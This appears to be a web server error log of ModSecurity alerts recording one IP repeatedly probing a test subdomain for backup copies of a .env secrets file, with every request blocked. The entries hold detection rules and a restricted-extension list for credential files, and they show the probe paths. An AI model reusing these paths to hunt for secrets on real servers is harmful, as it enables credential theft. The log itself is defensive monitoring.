[Fri Jan 16 03:14:06.200694 2026] [:error] [pid 1444031] [client 45.148.10.246:36556] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWme7n-9MmrgwjmYTAJQagAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak
[Fri Jan 16 03:14:06.200922 2026] [:error] [pid 1444031] [client 45.148.10.246:36556] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWme7n-9MmrgwjmYTAJQagAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak
[Fri Jan 16 03:14:06.201087 2026] [:error] [pid 1444031] [client 45.148.10.246:36556] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWme7n-9MmrgwjmYTAJQagAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak
[Fri Jan 16 03:14:06.315362 2026] [:error] [pid 1444033] [client 45.148.10.246:36560] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak/"] [unique_id "aWme7tLJkp65ULFQ2YYgkwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak/
[Fri Jan 16 03:14:06.315577 2026] [:error] [pid 1444033] [client 45.148.10.246:36560] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak/"] [unique_id "aWme7tLJkp65ULFQ2YYgkwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak/
[Fri Jan 16 03:14:06.315738 2026] [:error] [pid 1444033] [client 45.148.10.246:36560] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak/"] [unique_id "aWme7tLJkp65ULFQ2YYgkwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak/
[Fri Jan 16 03:14:06.487070 2026] [:error] [pid 1444034] [client 45.148.10.246:36564] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWme7uRfEYyDES-ZFL4ghwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.bak
[Fri Jan 16 03:14:06.487834 2026] [:error] [pid 1444034] [client 45.148.10.246:36564] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWme7uRfEYyDES-ZFL4ghwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.bak
[Fri Jan 16 03:14:06.488127 2026] [:error] [pid 1444034] [client 45.148.10.246:36564] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWme7uRfEYyDES-ZFL4ghwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.bak
[Fri Jan 16 03:14:06.488305 2026] [:error] [pid 1444034] [client 45.148.10.246:36564] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWme7uRfEYyDES-ZFL4ghwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.bak
[Fri Jan 16 03:14:06.641321 2026] [:error] [pid 1444032] [client 45.148.10.246:36578] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWme7ukMvq8uPO2ZciWohgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.bak
[Fri Jan 16 03:14:06.641458 2026] [:error] [pid 1444032] [client 45.148.10.246:36578] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWme7ukMvq8uPO2ZciWohgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.bak
[Fri Jan 16 03:14:06.641666 2026] [:error] [pid 1444032] [client 45.148.10.246:36578] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWme7ukMvq8uPO2ZciWohgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.bak
[Fri Jan 16 03:14:06.641829 2026] [:error] [pid 1444032] [client 45.148.10.246:36578] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWme7ukMvq8uPO2ZciWohgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.bak
[Fri Jan 16 03:14:06.796294 2026] [:error] [pid 1444226] [client 45.148.10.246:36584] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak1"] [unique_id "aWme7mcpoCUgeFICb0bc1wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak1
[Fri Jan 16 03:14:06.796509 2026] [:error] [pid 1444226] [client 45.148.10.246:36584] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak1"] [unique_id "aWme7mcpoCUgeFICb0bc1wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak1
[Fri Jan 16 03:14:06.796655 2026] [:error] [pid 1444226] [client 45.148.10.246:36584] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak1"] [unique_id "aWme7mcpoCUgeFICb0bc1wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak1
[Fri Jan 16 03:14:07.029245 2026] [:error] [pid 1444040] [client 45.148.10.246:36590] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak1/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak1/"] [unique_id "aWme7_n_5sIyKhJ5GAzXrgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak1/
[Fri Jan 16 03:14:07.029465 2026] [:error] [pid 1444040] [client 45.148.10.246:36590] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak1/"] [unique_id "aWme7_n_5sIyKhJ5GAzXrgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak1/
[Fri Jan 16 03:14:07.029629 2026] [:error] [pid 1444040] [client 45.148.10.246:36590] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak1/"] [unique_id "aWme7_n_5sIyKhJ5GAzXrgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak1/
[Fri Jan 16 03:14:07.181225 2026] [:error] [pid 1444031] [client 45.148.10.246:36598] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak1"] [unique_id "aWme73-9MmrgwjmYTAJQawAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env.bak1
[Fri Jan 16 03:14:07.181451 2026] [:error] [pid 1444031] [client 45.148.10.246:36598] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak1"] [unique_id "aWme73-9MmrgwjmYTAJQawAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env.bak1
[Fri Jan 16 03:14:07.181616 2026] [:error] [pid 1444031] [client 45.148.10.246:36598] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak1"] [unique_id "aWme73-9MmrgwjmYTAJQawAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env.bak1
[Fri Jan 16 03:14:07.347717 2026] [:error] [pid 1444033] [client 45.148.10.246:36604] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak1"] [unique_id "aWme79LJkp65ULFQ2YYglAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env.bak1
[Fri Jan 16 03:14:07.347950 2026] [:error] [pid 1444033] [client 45.148.10.246:36604] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak1"] [unique_id "aWme79LJkp65ULFQ2YYglAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env.bak1
[Fri Jan 16 03:14:07.348114 2026] [:error] [pid 1444033] [client 45.148.10.246:36604] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak1"] [unique_id "aWme79LJkp65ULFQ2YYglAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env.bak1
[Fri Jan 16 03:14:07.505803 2026] [:error] [pid 1444034] [client 45.148.10.246:36608] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak2"] [unique_id "aWme7-RfEYyDES-ZFL4giAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak2
[Fri Jan 16 03:14:07.506031 2026] [:error] [pid 1444034] [client 45.148.10.246:36608] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak2"] [unique_id "aWme7-RfEYyDES-ZFL4giAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak2
[Fri Jan 16 03:14:07.506188 2026] [:error] [pid 1444034] [client 45.148.10.246:36608] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak2"] [unique_id "aWme7-RfEYyDES-ZFL4giAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak2
[Fri Jan 16 03:14:07.690306 2026] [:error] [pid 1444032] [client 45.148.10.246:36616] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak2/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak2/"] [unique_id "aWme7-kMvq8uPO2ZciWohwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak2/
[Fri Jan 16 03:14:07.690602 2026] [:error] [pid 1444032] [client 45.148.10.246:36616] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak2/"] [unique_id "aWme7-kMvq8uPO2ZciWohwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak2/
[Fri Jan 16 03:14:07.690777 2026] [:error] [pid 1444032] [client 45.148.10.246:36616] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak2/"] [unique_id "aWme7-kMvq8uPO2ZciWohwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak2/
[Fri Jan 16 03:14:07.882982 2026] [:error] [pid 1444226] [client 45.148.10.246:36620] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak2"] [unique_id "aWme72cpoCUgeFICb0bc2AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.bak2
[Fri Jan 16 03:14:07.883206 2026] [:error] [pid 1444226] [client 45.148.10.246:36620] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak2"] [unique_id "aWme72cpoCUgeFICb0bc2AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.bak2
[Fri Jan 16 03:14:07.883355 2026] [:error] [pid 1444226] [client 45.148.10.246:36620] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak2"] [unique_id "aWme72cpoCUgeFICb0bc2AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.bak2
